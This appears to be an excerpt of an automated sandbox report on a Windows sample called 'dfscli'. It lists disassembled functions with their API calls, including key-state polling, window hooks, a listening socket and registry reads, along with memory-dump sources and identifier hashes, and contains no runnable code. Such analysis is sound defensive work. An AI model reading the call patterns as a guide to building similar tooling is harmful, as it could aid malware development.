                                                                  • Instruction Fuzzy Hash: F4016D35B20112DBDB29AF66F81166E77A2EBD6325F50453FE582D3390DB788C04CB98
                                                                  APIs
                                                                  • RtlAllocateHeap.NTDLL(00000000,00000008,00000480), ref: 02234344
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2117594434.0000000002231000.00000020.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: true
                                                                  • Associated: 00000002.00000002.2117580571.0000000002230000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.2117609013.000000000223D000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.2117634381.0000000002240000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.2117634381.0000000002245000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.2117634381.0000000002252000.00000002.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_2230000_dfscli.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AllocateHeap
                                                                  • String ID:
                                                                  • API String ID: 1279760036-0
                                                                  • Opcode ID: 4ea84e08adada8ab621872a34a5346ba314854720047554f852def73907b6ff2
                                                                  • Instruction ID: 296b42382ff2aefb50094ea54d7991c034f64f022902fbde112176804e9fbc5f
                                                                  • Instruction Fuzzy Hash: B3E065B6B613026BDB15F6F5745866B25EBABC0A8135448A9F401CB348EE748D014BD0
                                                                  APIs
                                                                  • FindResourceA.KERNEL32(?,?,00000006), ref: 00403267
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: FindResource
                                                                  • String ID:
                                                                  • API String ID: 1635176832-0
                                                                  • Opcode ID: 3fb110486180756d7062ab4bb5e945649043ed0de42859ea3d5401de1059676a
                                                                  • Instruction ID: 81cb0e02c961f06c601f38abdce0fa68ed7433aa8319f068ff8f8c5a31199cb9
                                                                  • Instruction Fuzzy Hash: 57D0C2263000202AE5101A0A7C01DBB679CDBC5636B01407FF881EA150D2349C03A1B1
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2117474523.00000000021C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 021C1000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_21c1000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: ExitProcess
                                                                  • String ID:
                                                                  • API String ID: 621844428-0
                                                                  • Opcode ID: dc788451ce77f23f7ff2bc00cbd212957274b8706c445c65905decfb28f47e4a
                                                                  • Instruction ID: 280596a6fe94c5078c6dc4b11a7193f30e0a75c0d5f26a5b63ac34db50331c57
                                                                  • Instruction Fuzzy Hash: E2D05EB8D80208BFD700EFA4E946B9DBBB4EB04312F208069E90467240E7705A248F52
                                                                  APIs
                                                                  • VirtualFree.KERNELBASE(?,?,?), ref: 021C182F
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2117474523.00000000021C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 021C1000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_21c1000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: FreeVirtual
                                                                  • String ID:
                                                                  • API String ID: 1263568516-0
                                                                  • Opcode ID: d0f3e4ff2abcb5624e12bde1add21b0f677e9b16e3495b6585c38dd98876ea35
                                                                  • Instruction ID: 30a1b28d409a6a9ef95a6e661cbcf9d5a69e4ed0df47bdad67b9bdd875e6279c
                                                                  • Instruction Fuzzy Hash: E3C04C7A55420CAB8B04DF98E884DEB7BEDBB8C610B14C548BA1D87200C630F9608BA4
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 00424A9E
                                                                  • GetFullPathNameA.KERNEL32(?,00000104,?,?,?,?,?), ref: 00424AC8
                                                                  • lstrcpynA.KERNEL32(?,?,00000104,?,?,?), ref: 00424AD9
                                                                    • Part of subcall function 00424A57: lstrcpynA.KERNEL32(00000000,?,00000104,?,?,?), ref: 00424A7C
                                                                    • Part of subcall function 00424A57: PathStripToRootA.SHLWAPI(00000000,?,?,?), ref: 00424A83
                                                                  • PathIsUNCA.SHLWAPI(?,?,?,?,?,?), ref: 00424B0E
                                                                  • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000,?,?,?), ref: 00424B32
                                                                  • CharUpperA.USER32(?,?,?,?), ref: 00424B4A
                                                                  • FindFirstFileA.KERNEL32(?,?,?,?,?), ref: 00424B63
                                                                  • FindClose.KERNEL32(00000000,?,?,?), ref: 00424B6F
                                                                  • lstrlenA.KERNEL32(?,?,?,?), ref: 00424B8C
                                                                  • lstrcpyA.KERNEL32(?,?,?,?,?), ref: 00424BAB
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: Path$Findlstrcpyn$CharCloseFileFirstFullH_prologInformationNameRootStripUpperVolumelstrcpylstrlen
                                                                  • String ID:
                                                                  • API String ID: 4080879615-0
                                                                  • Opcode ID: 0673f5eb62677d010cc7cd393616d49ad2b116331357cec368046e2544c01408
                                                                  • Instruction ID: 4b06695585c640ab3fe26250615955364903dab726ca119cf8fbbfb20b083b72
                                                                  • Instruction Fuzzy Hash: F1317531700128EBDB219FA5EC88BEEBBBCEF84355F4045A6F515E6250C7389E858B58
                                                                  APIs
                                                                  • _TranslateName.LIBCMT ref: 00418D59
                                                                  • _TranslateName.LIBCMT ref: 00418DA2
                                                                  • IsValidCodePage.KERNEL32(00000000,00000082,?,0043C8F0,00415C9D,?,0043F8E8,?), ref: 00418E06
                                                                  • IsValidLocale.KERNEL32(00000001), ref: 00418E1C
                                                                  • _strcat.LIBCMT ref: 00418E5F
                                                                    • Part of subcall function 00418BEC: _strlen.LIBCMT ref: 00418BF2
                                                                    • Part of subcall function 00418BEC: EnumSystemLocalesA.KERNEL32(00418802,00000001,?,0043C8F0,00415C9D,?,0043F8E8,?), ref: 00418C0C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: NameTranslateValid$CodeEnumLocaleLocalesPageSystem_strcat_strlen
                                                                  • String ID: 8:C$Norwegian-Nynorsk
                                                                  • API String ID: 4291917928-2144728078
                                                                  • Opcode ID: 574a487d4df5138f39aaf0a3a251f485e9dbddddad8006a7e9d6517df36a9767
                                                                  • Instruction ID: 2c2c8765f4b236233be1cdb350641c934f88d795d8981d40c2d079dedaed01f1
                                                                  • Instruction Fuzzy Hash: 6A4185B1B41340BBDB30AB61AC81BEB37A5AF65700B15143FE545D62F1DF3988C9862E
                                                                  APIs
                                                                  • GetLocaleInfoW.KERNEL32(00000000,00000001,00000000,00000000,00433B40,00000018,0041A0FB,?,?,?,00000080,00000000,?,?,00000001), ref: 0041B410
                                                                  • GetLastError.KERNEL32(?,?,00000001), ref: 0041B422
                                                                  • GetLocaleInfoW.KERNEL32(00000001,?,00000000,00000000,00433B40,00000018,0041A0FB,?,?,?,00000080,00000000,?,?,00000001), ref: 0041B46D
                                                                  • GetLocaleInfoW.KERNEL32(00000001,?,?,00000000,?,?,00000001), ref: 0041B4DC
                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,?,000000FF,?,?,00000000,00000000,?,00000000,?,?,00000001), ref: 0041B4FE
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: InfoLocale$ByteCharErrorLastMultiWide
                                                                  • String ID:
                                                                  • API String ID: 97497842-0
                                                                  • Opcode ID: ec53c0ac90a504556e3c511ba40ffa224ed2ccbe603bfc9167057ac1e3787858
                                                                  • Instruction ID: bfaabb92e0a3a5bf762b7feaf1de5f82b449aebafdeaeb8c174feb8ae06c27e5
                                                                  • Instruction Fuzzy Hash: B3318D70901229FBCF218F91DD459EF7F75EF09764B20812AF411A6262C7388A91DBE9
                                                                  APIs
                                                                  • GetLocaleInfoW.KERNEL32(00000000,00000001,00000000,00000000,00433B30,00000018,0041A1AF,?,?,0043F978,00000004,00000000,?,?,00000001), ref: 0041B2E0
                                                                  • GetLastError.KERNEL32(?,?,00000001), ref: 0041B2F2
                                                                  • GetLocaleInfoW.KERNEL32(00000001,?,?,?,00433B30,00000018,0041A1AF,?,?,0043F978,00000004,00000000,?,?,00000001), ref: 0041B31C
                                                                  • GetLocaleInfoA.KERNEL32(00000001,?,00000000,00000000,00433B30,00000018,0041A1AF,?,?,0043F978,00000004,00000000,?,?,00000001), ref: 0041B34B
                                                                  • GetLocaleInfoA.KERNEL32(00000001,?,?,?,?,?,00000001), ref: 0041B3B2
                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,000000FF,?,?,?,?,?,?,00000001), ref: 0041B3D2
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: InfoLocale$ByteCharErrorLastMultiWide
                                                                  • String ID:
                                                                  • API String ID: 97497842-0
                                                                  • Opcode ID: 4f91be03a2c579940054dd89145ab35aa975abc4abe92bc42905e97746423a69
                                                                  • Instruction ID: ba34957b19bfa83a15de8861c2d6b5f59c3863597e2d4372a0d3dd5a209f6675
                                                                  • Opcode Fuzzy Hash: 4f91be03a2c579940054dd89145ab35aa975abc4abe92bc42905e97746423a69
                                                                  • Instruction Fuzzy Hash: 48317E7090061DEBCF229F55DD459EF7B75FF48354B24412BF821A2260D33889A1DB99
APIs
• IsIconic.USER32(?), ref: 0040355A
  • Part of subcall function 004262F7: __EH_prolog.LIBCMT ref: 004262FC
  • Part of subcall function 004262F7: BeginPaint.USER32(?,?,?,?,0041FE9A), ref: 0042632A
• SendMessageA.USER32(?,00000027,?,00000000), ref: 00403581
• GetSystemMetrics.USER32(0000000B), ref: 0040358F
• GetSystemMetrics.USER32(0000000C), ref: 00403595
• GetClientRect.USER32(?,?), ref: 004035A2
• DrawIcon.USER32(?,?,?,?), ref: 004035DA
  • Part of subcall function 00426352: __EH_prolog.LIBCMT ref: 00426357
  • Part of subcall function 00426352: EndPaint.USER32(?,?,?,?,0041FEC0,?), ref: 00426374
Memory Dump Source
• Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
Similarity
• API ID: H_prologMetricsPaintSystem$BeginClientDrawIconIconicMessageRectSend
• String ID:
• API String ID: 1530917984-0
• Opcode ID: f17d443d2831e9e86dea4b6b252fb4e05b77bb08401c64c5df8ed99b70b6788c
• Instruction ID: c95341d9d7590c9a11ddb044179971413f278dffb205523bc6025f8df687dda5
• Opcode Fuzzy Hash: f17d443d2831e9e86dea4b6b252fb4e05b77bb08401c64c5df8ed99b70b6788c
• Instruction Fuzzy Hash: 841160B13143019FD224EF7DDC99D5B77A9ABC8214F444A2DF586C3290DA34E8068A65
APIs
  • Part of subcall function 004215CD: __EH_prolog.LIBCMT ref: 004215D2
  • Part of subcall function 00423C70: GetDlgItem.USER32(?,?), ref: 00423C7D
  • Part of subcall function 00423DD5: EnableWindow.USER32(?,?), ref: 00423DE2
• SetTimer.USER32(?,00000001,00000001,00000000), ref: 004036BE
• listen.WS2_32(?,00000005), ref: 004036FC
• SetTimer.USER32(?,00000001,00000001,00000000), ref: 0040370C
  • Part of subcall function 0042C0CB: __EH_prolog.LIBCMT ref: 0042C0D0
  • Part of subcall function 0042C0CB: inet_addr.WS2_32(?), ref: 0042C10F
  • Part of subcall function 0042C0CB: gethostbyname.WS2_32(?), ref: 0042C120
  • Part of subcall function 0042C0CB: htons.WS2_32(?), ref: 0042C137
• SetTimer.USER32(?,00000001,00000001,00000000), ref: 0040372C
Strings
Memory Dump Source
• Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
Similarity
• API ID: Timer$H_prolog$EnableItemWindowgethostbynamehtonsinet_addrlisten
• String ID: Busy now
• API String ID: 1258581902-130138695
• Opcode ID: fce8c989688a1dac9d09d51dfa971bfc43fe77928b07dafcd80c6029d8334aa1
• Instruction ID: 6490c2d23ba4975c4b10ba10ff6ed106fbde2c758548d969700f79071d26b33c
• Opcode Fuzzy Hash: fce8c989688a1dac9d09d51dfa971bfc43fe77928b07dafcd80c6029d8334aa1
• Instruction Fuzzy Hash: FC31243139072077E9356B72AC97FAE22A65B84B15F40051DB206AF1C1DEADBA41874C
APIs
• lstrcpyA.KERNEL32(00000800,LOC), ref: 00427F84
• LoadLibraryA.KERNEL32(?), ref: 00427FB7
• GetLocaleInfoA.KERNEL32(00000800,00000003,00000800,00000004), ref: 00427FC7
Strings
Memory Dump Source
• Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
Similarity
• API ID: InfoLibraryLoadLocalelstrcpy
• String ID: LOC
• API String ID: 864663389-519433814
• Opcode ID: 9b864cf7d00240f33efc80dbe4055dc1b43c4b1b79d0572f7f5122539e718ff0
• Instruction ID: 80581f1108e614f4ea904bb7e7a22fcd021204f87db94054b61d7c27fe4284fc
• Opcode Fuzzy Hash: 9b864cf7d00240f33efc80dbe4055dc1b43c4b1b79d0572f7f5122539e718ff0
• Instruction Fuzzy Hash: 9601F730B0C118EBDB14DB61ED45ADB376CEB00320F418562FA16E2190E738CA058BA9
APIs
  • Part of subcall function 00423CEB: GetWindowLongA.USER32(?,000000F0), ref: 00423CF6
• GetKeyState.USER32(00000010), ref: 00422199
• GetKeyState.USER32(00000011), ref: 004221A2
• GetKeyState.USER32(00000012), ref: 004221AB
• SendMessageA.USER32(?,00000111,0000E146,00000000), ref: 004221C1
Memory Dump Source
• Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
Similarity
• API ID: State$LongMessageSendWindow
• String ID:
• API String ID: 1063413437-0
• Opcode ID: aed42ab7bb75c1cd56564738b3e39d445ed7b92ea90c531288bc4bc1f9d8c3dd
• Instruction ID: 81c6e2ddc2ea8cfb9092195715bcc3f3fea8f194ae87aed2471ca2276cf2a0cc
• Opcode Fuzzy Hash: aed42ab7bb75c1cd56564738b3e39d445ed7b92ea90c531288bc4bc1f9d8c3dd
• Instruction Fuzzy Hash: E2F0E93A34036B35D92436777D01FB610144F41BD8FC1053AB702FA1E2C9D98C125239
Memory Dump Source
• Source File: 00000002.00000002.2117594434.0000000002231000.00000020.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: true
• Associated: 00000002.00000002.2117580571.0000000002230000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2117609013.000000000223D000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2117634381.0000000002240000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2117634381.0000000002245000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2117634381.0000000002252000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2230000_dfscli.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: da4503faa85e2536fbe8d3d6130376e8d800ca541ea1d2d3a56c6e55e03e2750
• Instruction ID: 1a67a81331231608b1f16fb79b598800c45d2d23ec3d36087902b8a1e38d23a9
• Opcode Fuzzy Hash: da4503faa85e2536fbe8d3d6130376e8d800ca541ea1d2d3a56c6e55e03e2750
• Instruction Fuzzy Hash: 3541BBE6B263069BEB66AAF9685473B72D69FC4504B14086AF905CF24CEF64CD4047C3
APIs
• RegisterWindowMessageA.USER32(Native), ref: 0042A314
• RegisterWindowMessageA.USER32(OwnerLink), ref: 0042A31D
• RegisterWindowMessageA.USER32(ObjectLink), ref: 0042A327
• RegisterWindowMessageA.USER32(Embedded Object), ref: 0042A331
• RegisterWindowMessageA.USER32(Embed Source), ref: 0042A33B
• RegisterWindowMessageA.USER32(Link Source), ref: 0042A345
• RegisterWindowMessageA.USER32(Object Descriptor), ref: 0042A34F
• RegisterWindowMessageA.USER32(Link Source Descriptor), ref: 0042A359
• RegisterWindowMessageA.USER32(FileName), ref: 0042A363
• RegisterWindowMessageA.USER32(FileNameW), ref: 0042A36D
• RegisterWindowMessageA.USER32(Rich Text Format), ref: 0042A377
• RegisterWindowMessageA.USER32(RichEdit Text and Objects), ref: 0042A381
Strings
Memory Dump Source
• Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
Similarity
• API ID: MessageRegisterWindow
• String ID: Embed Source$Embedded Object$FileName$FileNameW$Link Source$Link Source Descriptor$Native$Object Descriptor$ObjectLink$OwnerLink$Rich Text Format$RichEdit Text and Objects
• API String ID: 1814269913-2889995556
• Opcode ID: b09424a890d9c2d964cd6ab38d7185a386422683ead705cd42c27e26f868f6a1
• Instruction ID: fc5418e7bedd38ffc0e11e4f4bc2214e5acc9818e2d4631a821a168c411807f2
• Opcode Fuzzy Hash: b09424a890d9c2d964cd6ab38d7185a386422683ead705cd42c27e26f868f6a1
• Instruction Fuzzy Hash: 8E018C70A407845ACB30BFB69C09D4BBEE0EEC9B107615E6FE495A7660D6BCD001CF48
APIs
• GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00428019
• GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 00428024
• ConvertDefaultLocale.KERNEL32(?), ref: 00428055
• ConvertDefaultLocale.KERNEL32(?), ref: 0042805D
• GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 0042806A
• ConvertDefaultLocale.KERNEL32(?), ref: 00428084
• ConvertDefaultLocale.KERNEL32(000003FF), ref: 0042808A
• GetVersion.KERNEL32 ref: 00428098
• RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 004280BD
• RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?), ref: 004280E3
• ConvertDefaultLocale.KERNEL32(?), ref: 0042812F
• ConvertDefaultLocale.KERNEL32(76230A60), ref: 00428135
• RegCloseKey.ADVAPI32(?), ref: 00428140
Strings
Memory Dump Source
• Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
Similarity
• API ID: ConvertDefaultLocale$AddressProc$CloseHandleModuleOpenQueryValueVersion
• String ID: Control Panel\Desktop\ResourceLocale$GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll$ntdll.dll
• API String ID: 780041395-483790700
• Opcode ID: 978b5882cf4835e7424ef31a4d6838547d496389b0aa7b075c70622b72c37f28
• Instruction ID: 2dc31b13f6de58c0e78e48cd1bee0818dccec789095d0f28fd6a06ab5592f720
• Opcode Fuzzy Hash: 978b5882cf4835e7424ef31a4d6838547d496389b0aa7b075c70622b72c37f28
• Instruction Fuzzy Hash: A5514B71F40229AFDF109FE6DC85ABEBAB8EB48354F54043BF501E3290DA7C59419B68
APIs
  • Part of subcall function 00429CA6: __EH_prolog.LIBCMT ref: 00429CAB
• CallNextHookEx.USER32(?,00000003,?,?), ref: 00422E85
• GetClassLongA.USER32(?,000000E6), ref: 00422ECA
• GlobalGetAtomNameA.KERNEL32(?,?,00000005), ref: 00422EF6
• lstrcmpiA.KERNEL32(?,ime), ref: 00422F05
• SetWindowLongA.USER32(?,000000FC,Function_0002242E), ref: 00422F3F
• CallNextHookEx.USER32(?,00000003,?,?), ref: 00423043
• UnhookWindowsHookEx.USER32(?), ref: 00423054
Strings
Memory Dump Source
• Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
Similarity
• API ID: Hook$CallLongNext$AtomClassGlobalH_prologNameUnhookWindowWindowslstrcmpi
• String ID: #32768$AfxOldWndProc423$ime
• API String ID: 3204395069-4034971020
• Opcode ID: 2e54a2d68c0ca1e145083fe81b64065eb11ebc909a731c844331e9d10c2e6431
• Instruction ID: a72a045e4e3713aab608079d00397e783e2f759094d70b61f3d5639fb80dd1df
• Opcode Fuzzy Hash: 2e54a2d68c0ca1e145083fe81b64065eb11ebc909a731c844331e9d10c2e6431
• Instruction Fuzzy Hash: 6951C331700124BBDF219F61ED48B9E7BB4AF18361F908166F814A62A1C778DE45DBAC
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(USER32,?,?,?,00405143), ref: 0040501B
• GetProcAddress.KERNEL32(00000000,GetSystemMetrics), ref: 00405037
• GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 00405048
• GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 00405059
• GetProcAddress.KERNEL32(00000000,MonitorFromPoint), ref: 0040506A
• GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 0040507B
• GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 0040508C
• GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesA), ref: 0040509D
Strings
Memory Dump Source
• Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
Similarity
• API ID: AddressProc$HandleModule
• String ID: EnumDisplayDevicesA$EnumDisplayMonitors$GetMonitorInfoA$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32$`#vp,$v
• API String ID: 667068680-2614843311
• Opcode ID: 5547913a3e14e16a07a1123cd0d9303ef4187e5ce9ad497fcc0af7a3a5c74f0c
• Instruction ID: a51757c319cfb8603869d02164866bf9d90346e9d9b4ab7557ddca89ad350173
